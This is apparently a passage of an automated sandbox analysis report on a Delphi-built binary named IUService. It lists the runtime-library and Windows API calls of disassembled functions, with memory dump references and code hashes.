                                                                                                                                              • Part of subcall function 50019F4C: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,50019FD0), ref: 50019FA3
                                                                                                                                              • Part of subcall function 50019F4C: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,50019FD0), ref: 50019FAF
                                                                                                                                              • Part of subcall function 50019F4C: CharLowerBuffW.USER32(00000000,?,00000000,50019FD0), ref: 50019FB5
                                                                                                                                            • @Sysutils@AnsiLowerCase$qqrx20System@UnicodeString.RTL120(?,00000000,500288FA,?,?,?,00000000,00000000,?,5001CAC7,00000000,5001CC45), ref: 500288CA
                                                                                                                                            • @Sysutils@CompareStr$qqrx20System@UnicodeStringt1.RTL120(00000000,500288FA,?,?,?,00000000,00000000,?,5001CAC7,00000000,5001CC45), ref: 500288D3
                                                                                                                                              • Part of subcall function 50019BD4: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,00000000,500288D8,00000000,500288FA,?,?,?,00000000,00000000,?,5001CAC7,00000000,5001CC45), ref: 50019BF4
                                                                                                                                              • Part of subcall function 50019BD4: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,00000000,500288D8,00000000,500288FA,?,?,?,00000000,00000000,?,5001CAC7,00000000,5001CC45), ref: 50019C09
                                                                                                                                              • Part of subcall function 50019BD4: @System@@LStrArrayClr$qqrpvi.RTL120(?,00000000,00000000,500288D8,00000000,500288FA,?,?,?,00000000,00000000,?,5001CAC7,00000000,5001CC45), ref: 50019C5A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$StringSystem@@$Ansi$From$LowerStr$qqrr20Stringx27System@%Sysutils@T$us$i0$%$Case$qqrx20CharChar$qqrx20$ArrayBuffClr$qqrpviCompareInternalLen$qqrr20Str$qqrx20StringpbiStringt1
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2714845271-0
                                                                                                                                            • Opcode ID: 5ad6f6ad8a74d05bca40f67ae65e425fd22752f68b44519822e8c10b39ad4a31
                                                                                                                                            • Instruction ID: 3b1375f16a59b80594c295dcd8003e2593a585a6f493d83d981e7d870c7d49f9
                                                                                                                                            • Opcode Fuzzy Hash: 5ad6f6ad8a74d05bca40f67ae65e425fd22752f68b44519822e8c10b39ad4a31
                                                                                                                                            • Instruction Fuzzy Hash: EBF08936705344BFDB01DAE4ED51BDEB7EDDF48610F5145B2F900D3641D6749E408694
                                                                                                                                            APIs
                                                                                                                                            • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500265F7
                                                                                                                                            • @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(?,00000000,50026642,?,?,?,?,00000000), ref: 5002661C
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,50026642,?,?,?,?,00000000), ref: 50026627
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Unicode$System@@$Asg$qqrr20ClassClassoCreate$qqrp17Format$qqrx20MetaRecxiStringStringpx14Stringx20Sysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2203270808-0
                                                                                                                                            • Opcode ID: 8a06c8108bb7d8ccefdc9901acd0eb074360c6541fd827dabcbd55e415eef1b7
                                                                                                                                            • Instruction ID: 5c853f4ed2ac0c9bc1a77cb935357e7c10a3e6514227e9817a7166fb08a22db9
                                                                                                                                            • Opcode Fuzzy Hash: 8a06c8108bb7d8ccefdc9901acd0eb074360c6541fd827dabcbd55e415eef1b7
                                                                                                                                            • Instruction Fuzzy Hash: D6F0B431605589AFD710CA94EC52D5EB7ADEB8A660FA18372F90893640DA31AE05C691
                                                                                                                                            APIs
                                                                                                                                            • @System@@LStrFromPWChar$qqrr27System@%AnsiStringT$us$i0$%pbus.RTL120(?,00000000,500216F0,?,?,?,?,00000000), ref: 500216C2
                                                                                                                                            • @System@@LStrToPChar$qqrx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,500216F0,?,?,?,?,00000000), ref: 500216CA
                                                                                                                                            • @Sysutils@TextToFloat$qqrpcpv20Sysutils@TFloatValuerx24Sysutils@TFormatSettings.RTL120(?,00000000,500216F0,?,?,?,?,00000000), ref: 500216D3
                                                                                                                                              • Part of subcall function 50021580: @System@FPower10$qqrv.RTL120 ref: 50021606
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(500216F7,?,?,?,00000000), ref: 500216EA
                                                                                                                                              • Part of subcall function 500087A8: @System@@FreeMem$qqrpv.RTL120(?,50004445,5000444D), ref: 500087C4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$Sysutils@$AnsiStringSystem@%$Char$qqrr27Char$qqrx27Clr$qqrpvFloatFloat$qqrpcpv20FormatFreeFromMem$qqrpvPower10$qqrvSettingsSystem@T$us$i0$%T$us$i0$%pbusTextValuerx24
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3176001047-0
                                                                                                                                            • Opcode ID: 096e108351b0c95bdd88cef74aa5ff209f8a2702cfba72334109f8fd92193702
                                                                                                                                            • Instruction ID: 9fd13c48b86fe8ba40560011224ed825752708d08ad58dc217336ba303494022
                                                                                                                                            • Opcode Fuzzy Hash: 096e108351b0c95bdd88cef74aa5ff209f8a2702cfba72334109f8fd92193702
                                                                                                                                            • Instruction Fuzzy Hash: 43F02731305244ABE704CAA5FC61A9EB7EEEFE9640FA64176F505C3741DA70AD018694
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@AnsiLowerCase$qqrx20System@UnicodeString.RTL120(00000000,5002888D,?,?,?,00000000,00000000), ref: 50028854
                                                                                                                                              • Part of subcall function 50019F4C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50019FD0), ref: 50019F85
                                                                                                                                              • Part of subcall function 50019F4C: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,50019FD0), ref: 50019F98
                                                                                                                                              • Part of subcall function 50019F4C: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,50019FD0), ref: 50019FA3
                                                                                                                                              • Part of subcall function 50019F4C: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,50019FD0), ref: 50019FAF
                                                                                                                                              • Part of subcall function 50019F4C: CharLowerBuffW.USER32(00000000,?,00000000,50019FD0), ref: 50019FB5
                                                                                                                                            • @Sysutils@AnsiLowerCase$qqrx20System@UnicodeString.RTL120(?,00000000,5002888D,?,?,?,00000000,00000000), ref: 50028862
                                                                                                                                            • @Sysutils@CompareStr$qqrx20System@UnicodeStringt1.RTL120(00000000,5002888D,?,?,?,00000000,00000000), ref: 5002886B
                                                                                                                                              • Part of subcall function 50019BD4: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,00000000,500288D8,00000000,500288FA,?,?,?,00000000,00000000,?,5001CAC7,00000000,5001CC45), ref: 50019BF4
                                                                                                                                              • Part of subcall function 50019BD4: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,00000000,500288D8,00000000,500288FA,?,?,?,00000000,00000000,?,5001CAC7,00000000,5001CC45), ref: 50019C09
                                                                                                                                              • Part of subcall function 50019BD4: @System@@LStrArrayClr$qqrpvi.RTL120(?,00000000,00000000,500288D8,00000000,500288FA,?,?,?,00000000,00000000,?,5001CAC7,00000000,5001CC45), ref: 50019C5A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$StringSystem@@$Ansi$From$LowerStr$qqrr20Stringx27System@%Sysutils@T$us$i0$%$Case$qqrx20CharChar$qqrx20$ArrayBuffClr$qqrpviCompareInternalLen$qqrr20Str$qqrx20StringpbiStringt1
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2714845271-0
                                                                                                                                            • Opcode ID: 305cfe6e8fe4599ad0224e3db809e64d7292e10cee766da07364fbdc4708b33c
                                                                                                                                            • Instruction ID: 78bc52d133ef3eee87fb56faae3835f84c1f75803b4e5c0fcda7dd3ba297cfd4
                                                                                                                                            • Opcode Fuzzy Hash: 305cfe6e8fe4599ad0224e3db809e64d7292e10cee766da07364fbdc4708b33c
                                                                                                                                            • Instruction Fuzzy Hash: 5CF05E39705688BBEB01DAA4EC91F9EB7EDDB88610F9186B2F500D7641E674AE008694
                                                                                                                                            APIs
                                                                                                                                            • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 50026923
                                                                                                                                            • @Sysutils@LoadStr$qqri.RTL120(00000000,5002696D,?,?,?,?,00000000), ref: 50026941
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5002696D,?,?,?,?,00000000), ref: 5002694C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$System@@Unicode$Asg$qqrr20ClassClassoCreate$qqrp17LoadMetaStr$qqriStringStringx20Sysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1550118436-0
                                                                                                                                            • Opcode ID: 034090b49bb97b67128a40d4687890c5d9aaa484eac5c38350ac9ee2cffa029a
                                                                                                                                            • Instruction ID: 078013d5af54c5226b3ab0755ea7a38ccff1b0ce4df6d013d20a1ea011b46d79
                                                                                                                                            • Opcode Fuzzy Hash: 034090b49bb97b67128a40d4687890c5d9aaa484eac5c38350ac9ee2cffa029a
                                                                                                                                            • Instruction Fuzzy Hash: 12F05971500685BFD700CF64EC52C5AB7ACEB86710F918372F90897340EB31AE04C6D0
                                                                                                                                            APIs
                                                                                                                                            • @System@@LGetDir$qqrucr27System@%AnsiStringT$us$i0$%.RTL120(00000000,50004446), ref: 50004409
                                                                                                                                              • Part of subcall function 500042F0: GetCurrentDirectoryA.KERNEL32(00000105,?), ref: 50004321
                                                                                                                                              • Part of subcall function 500042F0: SetCurrentDirectoryA.KERNEL32(?,00000105,?), ref: 50004327
                                                                                                                                              • Part of subcall function 500042F0: GetCurrentDirectoryA.KERNEL32(00000105,?), ref: 50004336
                                                                                                                                              • Part of subcall function 500042F0: SetCurrentDirectoryA.KERNEL32(?,00000105,?), ref: 50004347
                                                                                                                                              • Part of subcall function 500042F0: @System@@LStrFromArray$qqrr27System@%AnsiStringT$us$i0$%pcius.RTL120(00000000,00000105,?), ref: 50004359
                                                                                                                                            • @System@@LStrToString$qqrv.RTL120(00000000,50004446), ref: 5000441C
                                                                                                                                              • Part of subcall function 50008BDC: @System@Move$qqrpxvpvi.RTL120(?,50004421,00000000,50004446), ref: 50008BF2
                                                                                                                                            • @System@@PStrNCpy$qqrp28System@%SmallString$iuc$255%t1uc.RTL120(00000000,50004446), ref: 5000442B
                                                                                                                                              • Part of subcall function 50004F14: @System@Move$qqrpxvpvi.RTL120(?,50004430,00000000,50004446), ref: 50004F26
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(5000444D), ref: 50004440
                                                                                                                                              • Part of subcall function 500087A8: @System@@FreeMem$qqrpv.RTL120(?,50004445,5000444D), ref: 500087C4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$CurrentDirectory$System@%$AnsiMove$qqrpxvpviStringSystem@$Array$qqrr27Clr$qqrpvCpy$qqrp28Dir$qqrucr27FreeFromMem$qqrpvSmallString$iuc$255%t1ucString$qqrvT$us$i0$%T$us$i0$%pcius
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 506161246-0
                                                                                                                                            • Opcode ID: 692566ae1197cd59d330c93bd91ad5e67e88b7571903b626b87b6deb05836648
                                                                                                                                            • Instruction ID: 1f1c8239afc9ae75611213fcacec5c0f4d323074735c47231db78d41111fae57
                                                                                                                                            • Opcode Fuzzy Hash: 692566ae1197cd59d330c93bd91ad5e67e88b7571903b626b87b6deb05836648
                                                                                                                                            • Instruction Fuzzy Hash: 6EF0E9B0A042489FE714DF95EDA199EB3BAFBC8300FD042BAA90493741DB741F048595
                                                                                                                                            APIs
                                                                                                                                            • @System@@LStrFromPWChar$qqrr27System@%AnsiStringT$us$i0$%pbus.RTL120(00000000,50021570,?,?,?,?,00000000,?,50021D4E,?,?,5001B7B7), ref: 50021542
                                                                                                                                            • @System@@LStrToPChar$qqrx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50021570,?,?,?,?,00000000,?,50021D4E,?,?,5001B7B7), ref: 5002154A
                                                                                                                                            • @Sysutils@TextToFloat$qqrpcpv20Sysutils@TFloatValue.RTL120(00000000,50021570,?,?,?,?,00000000,?,50021D4E,?,?,5001B7B7), ref: 50021553
                                                                                                                                              • Part of subcall function 50021408: @System@FPower10$qqrv.RTL120(00000000,00000000,?,00000000), ref: 5002148D
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(50021577,?,?,?,00000000,?,50021D4E,?,?,5001B7B7), ref: 5002156A
                                                                                                                                              • Part of subcall function 500087A8: @System@@FreeMem$qqrpv.RTL120(?,50004445,5000444D), ref: 500087C4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$AnsiStringSystem@%Sysutils@$Char$qqrr27Char$qqrx27Clr$qqrpvFloatFloat$qqrpcpv20FreeFromMem$qqrpvPower10$qqrvSystem@T$us$i0$%T$us$i0$%pbusTextValue
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3332700872-0
                                                                                                                                            • Opcode ID: 3868efb18936c867525fd66657176d425ff5bb23a5c2c67d669c6902671eb1b7
                                                                                                                                            • Instruction ID: d635544f2e29b8d36e0ff77d7db167ac281d6be62c4688162a595b10ac468aae
                                                                                                                                            • Opcode Fuzzy Hash: 3868efb18936c867525fd66657176d425ff5bb23a5c2c67d669c6902671eb1b7
                                                                                                                                            • Instruction Fuzzy Hash: 4EF05C31705244ABE304DAA5FC22A5DF6DDDFDA240FE10176F504D3341D9309E018290
                                                                                                                                            APIs
                                                                                                                                            • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 50026677
                                                                                                                                            • @Sysutils@LoadStr$qqri.RTL120(00000000,500266BB,?,?,?,?,00000000), ref: 50026695
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500266BB,?,?,?,?,00000000), ref: 500266A0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$System@@Unicode$Asg$qqrr20ClassClassoCreate$qqrp17LoadMetaStr$qqriStringStringx20Sysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1550118436-0
                                                                                                                                            APIs
                                                                                                                                            • @Character@TCharacter@IsLatin1$qqrb.RTL120 ref: 5001106D
                                                                                                                                            • @Character@TCharacter@CheckPunctuation$qqr26Character@TUnicodeCategory.RTL120 ref: 50011080
                                                                                                                                            • @Character@TCharacter@Initialize$qqrv.RTL120 ref: 50011090
                                                                                                                                            • @Character@TCharacter@CheckPunctuation$qqr26Character@TUnicodeCategory.RTL120 ref: 500110C9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Character@$CategoryCheckPunctuation$qqr26Unicode$Initialize$qqrvLatin1$qqrb
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 484436152-0
                                                                                                                                            APIs
                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 50035418
                                                                                                                                            • @Variants@@VarCopy$qqrr8TVarDatarx8TVarData.RTL120(00000000,5003545E,?,?,?,?), ref: 50035430
                                                                                                                                            • @Variants@@VarToWStr$qqrr17System@WideStringrx8TVarData.RTL120(?,?,?,?), ref: 50035443
                                                                                                                                            • @Variants@@VarClear$qqrr8TVarData.RTL120(50035465,?), ref: 50035458
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DataVariants@@$Clear$qqrr8Copy$qqrr8Datarx8InitStr$qqrr17Stringrx8System@VariantWide
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 624794194-0
                                                                                                                                            APIs
                                                                                                                                            • @Character@TCharacter@IsLatin1$qqrb.RTL120 ref: 500114F9
                                                                                                                                            • @Character@TCharacter@CheckSymbol$qqr26Character@TUnicodeCategory.RTL120 ref: 5001150C
                                                                                                                                            • @Character@TCharacter@Initialize$qqrv.RTL120 ref: 5001151C
                                                                                                                                            • @Character@TCharacter@CheckSymbol$qqr26Character@TUnicodeCategory.RTL120 ref: 50011555
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Character@$CategoryCheckSymbol$qqr26Unicode$Initialize$qqrvLatin1$qqrb
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 691609695-0
                                                                                                                                            APIs
                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 50035B04
                                                                                                                                            • @Variants@@VarCopy$qqrr8TVarDatarx8TVarData.RTL120(00000000,50035B4A,?,?,?,?), ref: 50035B1C
                                                                                                                                            • @Variants@@VarToUStr$qqrr20System@UnicodeStringrx8TVarData.RTL120(?,?,?,?), ref: 50035B2F
                                                                                                                                            • @Variants@@VarClear$qqrr8TVarData.RTL120(50035B51,?), ref: 50035B44
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DataVariants@@$Clear$qqrr8Copy$qqrr8Datarx8InitStr$qqrr20Stringrx8System@UnicodeVariant
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1468330936-0
                                                                                                                                            APIs
                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 500344C5
                                                                                                                                            • @Variants@@VarCopy$qqrr8TVarDatarx8TVarData.RTL120(00000000,5003450D,?,?,?), ref: 500344DD
                                                                                                                                            • @Variants@@VarToCurrency$qqrrx8TVarData.RTL120(?,?,?), ref: 500344EE
                                                                                                                                            • @Variants@@VarClear$qqrr8TVarData.RTL120(50034514), ref: 50034507
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DataVariants@@$Clear$qqrr8Copy$qqrr8Currency$qqrrx8Datarx8InitVariant
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1713342866-0
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@DecodeDate$qqrx16System@TDateTimerust2t2.RTL120(?,?), ref: 500226C4
                                                                                                                                              • Part of subcall function 500224F0: @Sysutils@DecodeDateFully$qqrx16System@TDateTimerust2t2t2.RTL120(?,?,5001D662,?,?,?,5001D662,?,?), ref: 50022503
                                                                                                                                            • @Sysutils@IncAMonth$qqrrust1t1i.RTL120(?,?,?), ref: 500226D3
                                                                                                                                              • Part of subcall function 50022708: @Sysutils@IsLeapYear$qqrus.RTL120 ref: 50022767
                                                                                                                                            • @Sysutils@EncodeDate$qqrususus.RTL120(?,?,?), ref: 500226E4
                                                                                                                                              • Part of subcall function 50022374: @Sysutils@TryEncodeDate$qqrusususr16System@TDateTime.RTL120 ref: 50022387
                                                                                                                                            • @Sysutils@ReplaceTime$qqrr16System@TDateTimex16System@TDateTime.RTL120(?,?,?,?,?), ref: 500226F6
                                                                                                                                              • Part of subcall function 50022798: @System@@TRUNC$qqrv.RTL120 ref: 500227A3
                                                                                                                                              • Part of subcall function 50022798: @System@Frac$qqrxg.RTL120 ref: 500227CC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sysutils@$DateSystem@$DecodeEncodeTime$C$qqrvDate$qqrusususDate$qqrusususr16Date$qqrx16Frac$qqrxgFully$qqrx16LeapMonth$qqrrust1t1iReplaceSystem@@Time$qqrr16Timerust2t2Timerust2t2t2Timex16Year$qqrus
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4205208091-0
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@TEncoding@GetByteCount$qqrx24System@%DynamicArray$tb%.RTL120(?,?,?,?,5002D1D7,00000000,5002D201,?,?,?,00000000), ref: 5002D73E
                                                                                                                                              • Part of subcall function 5002D4E0: @System@@DynArrayLength$qqrv.RTL120(?,?,5002D743,?,?,?,?,5002D1D7,00000000,5002D201,?,?,?,00000000), ref: 5002D4E8
                                                                                                                                              • Part of subcall function 5002D4E0: @Sysutils@TEncoding@GetByteCount$qqrx24System@%DynamicArray$tb%ii.RTL120(00000000,?,?,5002D743,?,?,?,?,5002D1D7,00000000,5002D201,?,?,?,00000000), ref: 5002D4F4
                                                                                                                                            • @System@@DynArraySetLength$qqrv.RTL120(00000000,?,?,?,?,5002D1D7,00000000,5002D201,?,?,?,00000000), ref: 5002D753
                                                                                                                                              • Part of subcall function 5000C0F4: @System@DynArraySetLength$qqrrpvpvipi.RTL120 ref: 5000C0F9
                                                                                                                                            • @System@@DynArrayLength$qqrv.RTL120 ref: 5002D75D
                                                                                                                                            • @Sysutils@TEncoding@GetBytes$qqrx24System@%DynamicArray$tb%iir25System@%DynamicArray$tuc%i.RTL120(00000000,?,00000000), ref: 5002D76C
                                                                                                                                              • Part of subcall function 5002D778: @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(?,?), ref: 5002D7A6
                                                                                                                                              • Part of subcall function 5002D778: @System@@RaiseExcept$qqrv.RTL120(?,?), ref: 5002D7AB
                                                                                                                                              • Part of subcall function 5002D778: @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(?,?), ref: 5002D7C9
                                                                                                                                              • Part of subcall function 5002D778: @System@@RaiseExcept$qqrv.RTL120(?,?), ref: 5002D7CE
                                                                                                                                              • Part of subcall function 5002D778: @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,00000000,?,?), ref: 5002D7F1
                                                                                                                                              • Part of subcall function 5002D778: @System@@RaiseExcept$qqrv.RTL120(00000000,00000000,?,?), ref: 5002D7F6
                                                                                                                                              • Part of subcall function 5002D778: @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,00000000,?,?), ref: 5002D819
                                                                                                                                              • Part of subcall function 5002D778: @System@@RaiseExcept$qqrv.RTL120(00000000,00000000,?,?), ref: 5002D81E
                                                                                                                                              • Part of subcall function 5002D778: @System@@DynArrayLength$qqrv.RTL120(?,?), ref: 5002D826
